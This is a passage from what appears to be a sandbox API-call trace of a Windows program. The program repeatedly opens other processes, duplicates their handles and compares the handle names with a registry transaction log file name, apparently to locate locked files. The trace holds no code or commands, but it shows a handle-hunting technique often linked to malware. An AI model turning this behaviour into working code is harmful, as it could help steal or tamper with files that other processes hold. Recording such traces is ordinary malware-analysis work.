lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.598] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.599] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.599] CloseHandle (hObject=0x670) returned 1 [0152.599] CloseHandle (hObject=0x680) returned 1 [0152.599] CloseHandle (hObject=0x62c) returned 1 [0152.599] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.599] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.600] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.600] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.601] CloseHandle (hObject=0x670) returned 1 [0152.601] CloseHandle (hObject=0x680) returned 1 [0152.601] CloseHandle (hObject=0x62c) returned 1 [0152.601] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.601] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.602] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.602] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.602] CloseHandle (hObject=0x670) returned 1 [0152.602] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.602] CloseHandle (hObject=0x680) returned 1 [0152.603] CloseHandle (hObject=0x62c) returned 1 [0152.603] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.603] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.603] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.604] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.604] CloseHandle (hObject=0x670) returned 1 [0152.604] CloseHandle (hObject=0x680) returned 1 [0152.604] CloseHandle (hObject=0x62c) returned 1 [0152.604] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.604] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.605] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.605] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.606] CloseHandle (hObject=0x670) returned 1 [0152.606] CloseHandle (hObject=0x680) returned 1 [0152.606] CloseHandle (hObject=0x62c) returned 1 [0152.606] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.606] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.607] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.607] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.607] CloseHandle (hObject=0x670) returned 1 [0152.607] CloseHandle (hObject=0x680) returned 1 [0152.607] CloseHandle (hObject=0x62c) returned 1 [0152.607] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.607] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.608] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.609] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.609] CloseHandle (hObject=0x670) returned 1 [0152.609] CloseHandle (hObject=0x680) returned 1 [0152.609] CloseHandle (hObject=0x62c) returned 1 [0152.609] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.609] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.609] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.610] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.610] CloseHandle (hObject=0x670) returned 1 [0152.610] CloseHandle (hObject=0x680) returned 1 [0152.610] CloseHandle (hObject=0x62c) returned 1 [0152.610] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.610] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.611] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.612] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.612] CloseHandle (hObject=0x670) returned 1 [0152.612] CloseHandle (hObject=0x680) returned 1 [0152.612] CloseHandle (hObject=0x62c) returned 1 [0152.612] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.612] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.612] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.613] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.613] CloseHandle (hObject=0x670) returned 1 [0152.613] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.613] CloseHandle (hObject=0x680) returned 1 [0152.613] CloseHandle (hObject=0x62c) returned 1 [0152.614] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.614] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.614] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.620] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.620] CloseHandle (hObject=0x670) returned 1 [0152.620] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.620] CloseHandle (hObject=0x680) returned 1 [0152.620] CloseHandle (hObject=0x62c) returned 1 [0152.620] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0152.620] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.621] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.621] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.622] CloseHandle (hObject=0x670) returned 1 [0152.622] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.622] CloseHandle (hObject=0x680) returned 1 [0152.622] CloseHandle (hObject=0x62c) returned 1 [0152.622] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.622] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.622] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.623] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.623] CloseHandle (hObject=0x670) returned 1 [0152.623] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.623] CloseHandle (hObject=0x680) returned 1 [0152.623] CloseHandle (hObject=0x62c) returned 1 [0152.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.623] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.624] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.624] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.625] CloseHandle (hObject=0x670) returned 1 [0152.625] CloseHandle (hObject=0x680) returned 1 [0152.625] CloseHandle (hObject=0x62c) returned 1 [0152.625] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.625] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.626] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.628] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.628] CloseHandle (hObject=0x670) returned 1 [0152.628] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.628] CloseHandle (hObject=0x680) returned 1 [0152.628] CloseHandle (hObject=0x62c) returned 1 [0152.628] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.628] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.629] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.629] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.629] CloseHandle (hObject=0x670) returned 1 [0152.629] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.630] CloseHandle (hObject=0x680) returned 1 [0152.630] CloseHandle (hObject=0x62c) returned 1 [0152.630] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.630] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.630] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.631] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.631] CloseHandle (hObject=0x670) returned 1 [0152.631] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.631] CloseHandle (hObject=0x680) returned 1 [0152.631] CloseHandle (hObject=0x62c) returned 1 [0152.631] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.631] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.632] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.633] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.633] CloseHandle (hObject=0x670) returned 1 [0152.633] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.633] CloseHandle (hObject=0x680) returned 1 [0152.633] CloseHandle (hObject=0x62c) returned 1 [0152.633] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.633] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.634] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.634] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.634] CloseHandle (hObject=0x670) returned 1 [0152.635] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.635] CloseHandle (hObject=0x680) returned 1 [0152.635] CloseHandle (hObject=0x62c) returned 1 [0152.635] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.635] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.635] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.636] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.636] CloseHandle (hObject=0x670) returned 1 [0152.636] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.636] CloseHandle (hObject=0x680) returned 1 [0152.636] CloseHandle (hObject=0x62c) returned 1 [0152.636] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.636] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.637] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.638] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.638] CloseHandle (hObject=0x670) returned 1 [0152.638] CloseHandle (hObject=0x680) returned 1 [0152.638] CloseHandle (hObject=0x62c) returned 1 [0152.638] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.638] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.639] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.639] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.639] CloseHandle (hObject=0x670) returned 1 [0152.639] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.639] CloseHandle (hObject=0x680) returned 1 [0152.639] CloseHandle (hObject=0x62c) returned 1 [0152.639] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.639] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.640] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.640] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.642] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.643] CloseHandle (hObject=0x670) returned 1 [0152.643] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.643] CloseHandle (hObject=0x680) returned 1 [0152.643] CloseHandle (hObject=0x62c) returned 1 [0152.643] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.643] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.644] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.646] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.646] CloseHandle (hObject=0x670) returned 1 [0152.646] CloseHandle (hObject=0x680) returned 1 [0152.646] CloseHandle (hObject=0x62c) returned 1 [0152.646] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.646] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.647] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.648] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.648] CloseHandle (hObject=0x670) returned 1 [0152.648] CloseHandle (hObject=0x680) returned 1 [0152.648] CloseHandle (hObject=0x62c) returned 1 [0152.648] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.648] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.648] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.649] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.649] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.649] CloseHandle (hObject=0x670) returned 1 [0152.649] CloseHandle (hObject=0x680) returned 1 [0152.649] CloseHandle (hObject=0x62c) returned 1 [0152.649] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.649] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.650] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.651] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.651] CloseHandle (hObject=0x670) returned 1 [0152.651] _wcsicmp (_Str1="\\System.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.651] CloseHandle (hObject=0x680) returned 1 [0152.651] CloseHandle (hObject=0x62c) returned 1 [0152.651] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.651] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.652] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.652] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.652] CloseHandle (hObject=0x670) returned 1 [0152.652] _wcsicmp (_Str1="\\Application.evtx", 